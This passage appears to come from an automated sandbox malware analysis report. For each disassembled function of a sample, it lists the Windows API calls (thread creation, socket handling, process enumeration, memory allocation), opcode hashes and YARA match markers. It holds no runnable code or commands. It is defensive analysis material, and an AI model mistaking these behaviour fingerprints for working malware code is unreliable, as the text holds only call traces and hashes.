                                                                                                                            • Instruction Fuzzy Hash: 251108B7100706AFEB13AFA5DC40E9BB7DAFF45374B100C29F91886140DB72D514DAA0
                                                                                                                            Function 0362FA29 Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 0362FA4E
                                                                                                                            • __calloc_crt.LIBCMT ref: 0362FA5A
                                                                                                                            • __getptd.LIBCMT ref: 0362FA67
                                                                                                                            • CreateThread.KERNEL32(?,?,0362F9C4,00000000,?,?), ref: 0362FA9E
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 0362FAA8
                                                                                                                            • _free.LIBCMT ref: 0362FAB1
                                                                                                                            • __dosmaperr.LIBCMT ref: 0362FABC
                                                                                                                              • Part of subcall function 0362F91B: __getptd_noexit.LIBCMT ref: 0362F91B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 155776804-0
                                                                                                                            • Opcode ID: fe74183a04429a1ef4c9a61f20fbf45159c695ea57df3eea8b063e5c0808fded
                                                                                                                            • Instruction ID: a92b999f64af15d3b89a3b9f42c89e58949e3b3e5a01f3ce36a1bc76bebc142e
                                                                                                                            • Opcode Fuzzy Hash: fe74183a04429a1ef4c9a61f20fbf45159c695ea57df3eea8b063e5c0808fded
                                                                                                                            • Instruction Fuzzy Hash: ED11E93A600B26BFD711EFA5DD4099B7FA8DF05B707160419F9148E290DB71D4018F68
                                                                                                                            Function 03627410 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03627523), ref: 0362743D
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 03627444
                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03627523), ref: 03627452
                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03627523), ref: 0362745A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoSystem$AddressHandleModuleNativeProc
                                                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                            • API String ID: 3433367815-192647395
                                                                                                                            • Opcode ID: c11cbc4289d90fe721ef0beb39d5b5cd3dcdb0c2ecaecb01d4195204f3e866db
                                                                                                                            • Instruction ID: 034783fb2d999ca97800cc0913dbcc99e67444e0e76faa4e5ea46f498518ac16
                                                                                                                            • Opcode Fuzzy Hash: c11cbc4289d90fe721ef0beb39d5b5cd3dcdb0c2ecaecb01d4195204f3e866db
                                                                                                                            • Instruction Fuzzy Hash: 46014BB4E002099FCF50EFF49944AEEBFF5EB08200F5445A9EA59E3245E7359A10CF61
                                                                                                                            Function 02C371B6 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 02C371BC
                                                                                                                              • Part of subcall function 02C39754: TlsGetValue.KERNEL32(00000000,02C398AD,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F,00000000,00000000), ref: 02C3975D
                                                                                                                              • Part of subcall function 02C39754: DecodePointer.KERNEL32(?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F,00000000,00000000,?,02C399BA,0000000D), ref: 02C3976F
                                                                                                                              • Part of subcall function 02C39754: TlsSetValue.KERNEL32(00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F,00000000,00000000,?,02C399BA), ref: 02C3977E
                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 02C371C7
                                                                                                                              • Part of subcall function 02C39734: TlsGetValue.KERNEL32(?,?,02C371CC,00000000), ref: 02C39742
                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 02C371DA
                                                                                                                              • Part of subcall function 02C39788: DecodePointer.KERNEL32(?,?,?,02C371DF,00000000,?,00000000), ref: 02C39799
                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 02C371E3
                                                                                                                            • ExitThread.KERNEL32 ref: 02C371EA
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C371F0
                                                                                                                            • __freefls@4.LIBCMT ref: 02C37210
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2383549826-0
                                                                                                                            • Opcode ID: 7398fddb1fe519271883309175e14629fe64a72ce9833a52547cbb8ade808a32
                                                                                                                            • Instruction ID: 3f8d3af96736b89447eaaefb5eb5bdd41e0f05566b714ac37699053b9e1934b0
                                                                                                                            • Opcode Fuzzy Hash: 7398fddb1fe519271883309175e14629fe64a72ce9833a52547cbb8ade808a32
                                                                                                                            • Instruction Fuzzy Hash: A4F0B4B9400644AFC706BF71CD4894EBBEABF8A3543108D58E80887201DB38D846DFE0
                                                                                                                            Function 0362F9C4 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 0362F9CA
                                                                                                                              • Part of subcall function 03633CA0: TlsGetValue.KERNEL32(00000000,03633DF9,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76,00000000,00000000), ref: 03633CA9
                                                                                                                              • Part of subcall function 03633CA0: DecodePointer.KERNEL32(?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76,00000000,00000000,?,03633F06,0000000D), ref: 03633CBB
                                                                                                                              • Part of subcall function 03633CA0: TlsSetValue.KERNEL32(00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76,00000000,00000000,?,03633F06), ref: 03633CCA
                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 0362F9D5
                                                                                                                              • Part of subcall function 03633C80: TlsGetValue.KERNEL32(?,?,0362F9DA,00000000), ref: 03633C8E
                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 0362F9E8
                                                                                                                              • Part of subcall function 03633CD4: DecodePointer.KERNEL32(?,?,?,0362F9ED,00000000,?,00000000), ref: 03633CE5
                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 0362F9F1
                                                                                                                            • ExitThread.KERNEL32 ref: 0362F9F8
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0362F9FE
                                                                                                                            • __freefls@4.LIBCMT ref: 0362FA1E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2383549826-0
                                                                                                                            • Opcode ID: d98808e6cb1cc285883377c44e673248fb0b28f20ec59bfe329a411fde87974f
                                                                                                                            • Instruction ID: 40cd50ab371d45a0ef926c4f9497bed703e05932f1a381cc5094bc8e6e5e9525
                                                                                                                            • Opcode Fuzzy Hash: d98808e6cb1cc285883377c44e673248fb0b28f20ec59bfe329a411fde87974f
                                                                                                                            • Instruction Fuzzy Hash: FCF0497CA00B10ABC708FF61CA0880E7FA8AF8A244332855CE9098F305DB34D442CBA9
                                                                                                                            Function 03626050 Relevance: 9.1, APIs: 6, Instructions: 86processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0362607C
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03626088
                                                                                                                            • Process32FirstW.KERNEL32(00000000,00000000), ref: 036260B9
                                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0362610F
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 03626116
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2526126748-0
                                                                                                                            • Opcode ID: e5298337bb4a84f39c5ec2438b9a15aced585c749dad4567df8cb55f1961a685
                                                                                                                            • Instruction ID: e2b4713079339c9d523786efeb51baa28a1020bafd6d0c035ce3cd01924eb788
                                                                                                                            • Opcode Fuzzy Hash: e5298337bb4a84f39c5ec2438b9a15aced585c749dad4567df8cb55f1961a685
                                                                                                                            • Instruction Fuzzy Hash: DC210735A00538ABDB20EF64DD59BFABBB8EF15310F150699ED0997284EB719A00CB54
                                                                                                                            Function 02C332E0 Relevance: 9.0, APIs: 6, Instructions: 32synchronizationsleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C332F1
                                                                                                                            • Sleep.KERNEL32(00000258), ref: 02C332FE
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02C33306
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C33312
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C3331A
                                                                                                                            • Sleep.KERNEL32(0000012C), ref: 02C3332B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3137405945-0
                                                                                                                            • Opcode ID: 87487e45a74a04eeb8a1a19a1cf27b567b8bad26b076bb0badc9575d04833f03
                                                                                                                            • Instruction ID: 001bc9d16a975b1b58140a42cc261a1910b940383565a9013f7bac0a605da8c7
                                                                                                                            • Opcode Fuzzy Hash: 87487e45a74a04eeb8a1a19a1cf27b567b8bad26b076bb0badc9575d04833f03
                                                                                                                            • Instruction Fuzzy Hash: E9F0827A2443046BD610ABA9DC84F47F3E8AF95370B204B09F221872D0CAB0F8018BA0
                                                                                                                            Function 03626690 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110comCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 0362669B
                                                                                                                            • CoCreateInstance.OLE32(036446FC,00000000,00000001,0364471C,?,?,?,?,?,?,?,?,?,?,0362588A), ref: 036266B2
                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 0362674C
                                                                                                                            • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,0362588A), ref: 0362677D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFreeInitializeInstanceStringUninitialize
                                                                                                                            • String ID: FriendlyName
                                                                                                                            • API String ID: 841178590-3623505368
                                                                                                                            • Opcode ID: 6b247c1d49db764e31059c3e6f6f5a07dcd125729ca410d4617ea7e68010c777
                                                                                                                            • Instruction ID: aba9455cb9fc7df1ca8e1a18c3fce600c599df9073f16e814c4347f9fdc73426
                                                                                                                            • Opcode Fuzzy Hash: 6b247c1d49db764e31059c3e6f6f5a07dcd125729ca410d4617ea7e68010c777
                                                                                                                            • Instruction Fuzzy Hash: 5C315C75B00605AFDB00DA99DC84EAEB7B9EF88704F148588F504EB354DB71E901CB60
                                                                                                                            Function 0362F707 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 0362F721
                                                                                                                              • Part of subcall function 0362F673: __FF_MSGBANNER.LIBCMT ref: 0362F68C
                                                                                                                              • Part of subcall function 0362F673: __NMSG_WRITE.LIBCMT ref: 0362F693
                                                                                                                              • Part of subcall function 0362F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76), ref: 0362F6B8
                                                                                                                            • std::exception::exception.LIBCMT ref: 0362F756
                                                                                                                            • std::exception::exception.LIBCMT ref: 0362F770
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0362F781
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                            • String ID: bad allocation
                                                                                                                            • API String ID: 615853336-2104205924
                                                                                                                            • Opcode ID: 389636161816aef32392fed7a5e29ef118bffa8334f94bea3ee50ade91c9fcb1
                                                                                                                            • Instruction ID: dd6f967e5a586e2c8612b713ffb4ab1e730cb8c673b4bb8020cf29bcafc2392f
                                                                                                                            • Opcode Fuzzy Hash: 389636161816aef32392fed7a5e29ef118bffa8334f94bea3ee50ade91c9fcb1
                                                                                                                            • Instruction Fuzzy Hash: 45F02878D00B296FCB04FB14ED34A9E7FF9AB42204F25001DE814DE295DBB08A018F98
                                                                                                                            Function 02C32D10 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 02C32D3C
                                                                                                                            • CancelIo.KERNEL32(?), ref: 02C32D46
                                                                                                                            • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02C32D4F
                                                                                                                            • closesocket.WS2_32(?), ref: 02C32D59
                                                                                                                            • SetEvent.KERNEL32(00000001), ref: 02C32D63
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1486965892-0
                                                                                                                            • Opcode ID: c6dacf04cafee0e597929a149531abf3c023effd879e0191e2ffeb6bd81698fd
                                                                                                                            • Instruction ID: aceb3a2c06f47eb61cd4938c11d42f65ee281d5bc3e473547e4a10fddb34445f
                                                                                                                            • Opcode Fuzzy Hash: c6dacf04cafee0e597929a149531abf3c023effd879e0191e2ffeb6bd81698fd
                                                                                                                            • Instruction Fuzzy Hash: F2F03C7A540700ABD2209F54EC49B5777F8BB89B51F504B59F68296680C7B0B9048BE0
                                                                                                                            Function 03622D30 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 03622D5C
                                                                                                                            • CancelIo.KERNEL32(?), ref: 03622D66
                                                                                                                            • InterlockedExchange.KERNEL32(00000000,00000000), ref: 03622D6F
                                                                                                                            • closesocket.WS2_32(?), ref: 03622D79
                                                                                                                            • SetEvent.KERNEL32(00000001), ref: 03622D83
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1486965892-0
                                                                                                                            • Opcode ID: d0a7a9a09787ed929cbaa51fb95ba61686f218cdb8d196c906ffb494af4d330e
                                                                                                                            • Instruction ID: 2a642f82d791cc58d96a2d59fb21753aae2ab85e4f43efac95d0ac7b725e2223
                                                                                                                            • Opcode Fuzzy Hash: d0a7a9a09787ed929cbaa51fb95ba61686f218cdb8d196c906ffb494af4d330e
                                                                                                                            • Instruction Fuzzy Hash: FCF03C7A500704ABD334AF54DD59B6777B8BB49B11F204A1CF79297688C7B0B5048BA0
                                                                                                                            Function 02C36F17 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 02C36F31
                                                                                                                              • Part of subcall function 02C36E83: __FF_MSGBANNER.LIBCMT ref: 02C36E9C
                                                                                                                              • Part of subcall function 02C36E83: __NMSG_WRITE.LIBCMT ref: 02C36EA3
                                                                                                                              • Part of subcall function 02C36E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F), ref: 02C36EC8
                                                                                                                            • std::exception::exception.LIBCMT ref: 02C36F66
                                                                                                                            • std::exception::exception.LIBCMT ref: 02C36F80
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 02C36F91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 615853336-0
                                                                                                                            • Opcode ID: cc7aceb83a5890e15f48985be58e8d8aeb65ad39a001d008c35994c0bee0dcf3
                                                                                                                            • Instruction ID: 000a5eed12ff597f3794b547df7aa4289859c9401c257602d801b3d647c69327
                                                                                                                            • Opcode Fuzzy Hash: cc7aceb83a5890e15f48985be58e8d8aeb65ad39a001d008c35994c0bee0dcf3
                                                                                                                            • Instruction Fuzzy Hash: 5CF0F47A940109BAEB02EBA5D810BAF7AEF9B44718F300818E409E6090DFB18B44DB59
                                                                                                                            Function 03623160 Relevance: 4.6, APIs: 3, Instructions: 88threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0362316B
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 03623183
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0362322F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread$ExchangeInterlocked
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4033114805-0
                                                                                                                            • Opcode ID: 5b28ac591bb99c4f7b9d09a087f6841f6aac5c4ae8a2ffb4c4c598092f837183
                                                                                                                            • Instruction ID: 12a83320524e364797332ef0aa42bbff804679c71eea85365e80a517e033165f
                                                                                                                            • Opcode Fuzzy Hash: 5b28ac591bb99c4f7b9d09a087f6841f6aac5c4ae8a2ffb4c4c598092f837183
                                                                                                                            • Instruction Fuzzy Hash: BC31AB78200A129FC718DF29C988A66BBE8FF44704B21C52CE95ACB719D735F842CF84
                                                                                                                            Function 02C311B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __floor_pentium4.LIBCMT ref: 02C311E9
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02C31226
                                                                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02C31255
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2605973128-0
                                                                                                                            • Opcode ID: de669f62438cc9ef00450380b40db4f36ef31e4262ab97b89e41e92edcac9aff
                                                                                                                            • Instruction ID: ca3eec866222b930b4eb77283aed62d0042d76467832b7a5527a14ef2e53f441
                                                                                                                            • Opcode Fuzzy Hash: de669f62438cc9ef00450380b40db4f36ef31e4262ab97b89e41e92edcac9aff
                                                                                                                            • Instruction Fuzzy Hash: 3F21BE30E00309AFDB149FAAD885BAFFBF5FF40705F0089A9E849A2640E770A9108B50
                                                                                                                            Function 036211B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __floor_pentium4.LIBCMT ref: 036211E9
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 03621226
                                                                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03621255
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2605973128-0
                                                                                                                            • Opcode ID: 494f605f70349b78b2b8633a62bfb558f38f90998586665a23a3a3243462754d
                                                                                                                            • Instruction ID: fdb62915d504faf6d25e2b0f3c3bb8899ff32edeadcb2539ff3184284402d77b
                                                                                                                            • Opcode Fuzzy Hash: 494f605f70349b78b2b8633a62bfb558f38f90998586665a23a3a3243462754d
                                                                                                                            • Instruction Fuzzy Hash: CB21BE74E04B09ABDB10DFA9D845B6FBBF8EF41701F0085ADE949A2644EB30A8508B44
                                                                                                                            Function 02C31100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __floor_pentium4.LIBCMT ref: 02C3112F
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02C3115F
                                                                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02C31192
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
